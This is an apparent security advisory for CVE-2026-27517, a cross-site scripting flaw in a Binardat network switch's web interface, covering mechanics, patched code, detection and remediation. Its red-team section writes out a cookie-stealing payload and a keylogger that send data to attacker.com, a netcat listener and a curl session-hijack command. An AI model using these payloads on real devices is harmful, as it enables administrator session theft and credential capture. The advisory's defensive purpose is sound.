CVE-2026-27517
Executive Summary
CVE-2026-27517 is a stored/reflected Cross-Site Scripting (XSS) vulnerability affecting the Binardat 10G08-0800GSM network switch firmware version V300SP10260209 and prior. The web interface fails to sanitize user-supplied input, allowing an attacker to inject arbitrary JavaScript that executes in the context of an authenticated user's browser. This can lead to session hijacking, credential theft, or further lateral movement within the network. No public exploit code or patch is currently available.

Deep Dive & Mechanics
The vulnerability resides in the web management interface of the Binardat 10G08-0800GSM switch. The application reflects user-supplied input (e.g., in error messages, configuration fields, or log displays) without proper encoding or sanitization. An attacker can craft a malicious URL or inject payloads into fields that are later rendered in an administrator's browser.
Attack Flow:
- Attacker identifies a parameter (e.g.,
?error=,?msg=, or a configuration field) that is reflected in the HTML response. - Attacker crafts a URL containing a JavaScript payload:
?error=<script>alert('XSS')</script>. - Attacker sends the link to an authenticated administrator via phishing email or social engineering.
- The administrator clicks the link while logged into the switch's web interface.
- The payload executes in the admin's browser, allowing the attacker to:
- Steal session cookies (
document.cookie). - Perform actions on behalf of the admin (e.g., change configuration, exfiltrate data).
- Redirect to a malicious site for credential harvesting.
- Steal session cookies (
Vulnerable vs. Patched Code
Vulnerable Code (Conceptual):
// vulnerable.php
$error = $_GET['error'];
echo "<div class='error'>$error</div>";
Patched Code (Conceptual):
// patched.php
$error = htmlspecialchars($_GET['error'], ENT_QUOTES, 'UTF-8');
echo "<div class='error'>$error</div>";
The vulnerable version directly interpolates user input into HTML without encoding. The patched version uses htmlspecialchars() to convert special characters (<, >, ", ', &) into their HTML entities, preventing script execution.
Exploitation & Lab Setup
Red Team (Offensive)
Lab Environment:
- Binardat 10G08-0800GSM switch with firmware V300SP10260209
- Attacker machine (Kali Linux)
- Victim machine (Windows/Linux with browser)
- Network connectivity between attacker, victim, and switch
Exploitation Steps:
- Identify a reflected parameter (e.g.,
?error=in the login page or configuration panel). - Craft a payload to steal cookies:
http://<switch-ip>/index.cgi?error=<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script> - Send the link to an authenticated admin.
- Set up a listener on attacker machine:
nc -lvnp 80 - When admin clicks the link, the cookie is exfiltrated to the attacker's server.
- Use the stolen cookie to hijack the session:
curl -b "session=<stolen_cookie>" http://<switch-ip>/admin/config.cgi
Advanced Payload (Keylogger):
document.addEventListener('keydown', function(e) {
fetch('http://attacker.com/keylog?key='+e.key);
});
Blue Team (Defensive)
Detection Steps:
- Monitor web server logs for unusual parameters containing
<script>,onerror=,javascript:. - Deploy a Web Application Firewall (WAF) with rules to block reflected XSS patterns.
- Implement Content Security Policy (CSP) headers:
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none' - Enforce HttpOnly and Secure flags on session cookies.
- Conduct regular code reviews and input validation testing.
Indicators of Compromise (IOCs)
Network IOCs:
- HTTP requests containing
<script>,onerror=,javascript:in query parameters or POST bodies. - Outbound connections from the switch to unknown IPs on port 80/443 (data exfiltration).
- Unusual
Refererheaders pointing to attacker-controlled domains.
- HTTP requests containing
Host IOCs:
- Unexpected JavaScript files or scripts in the switch's web root.
- Modified configuration files containing injected JavaScript.
- Presence of
document.cookieorfetch()calls in web interface logs.
Log IOCs:
- Repeated 400/500 errors from the web interface.
- Log entries showing
alert('XSS')or similar test payloads.

Remediation & Mitigation
Immediate Actions:
- Isolate the switch from untrusted networks (place behind a firewall with strict ACLs).
- Disable remote web access if not required; use CLI or SNMP for management.
- Implement a reverse proxy (e.g., Nginx) with WAF rules to filter XSS payloads.
- Manually sanitize input in the web interface by adding
htmlspecialchars()or equivalent encoding.
Long-Term Fix:
- Vendor must release a patched firmware version that properly encodes all user-supplied input.
- Until a patch is available, consider replacing the device with a vendor that provides active security support.
Workaround:
- Use a browser extension (e.g., NoScript) for administrators to block JavaScript by default.
- Enforce multi-factor authentication (MFA) to reduce impact of session hijacking.
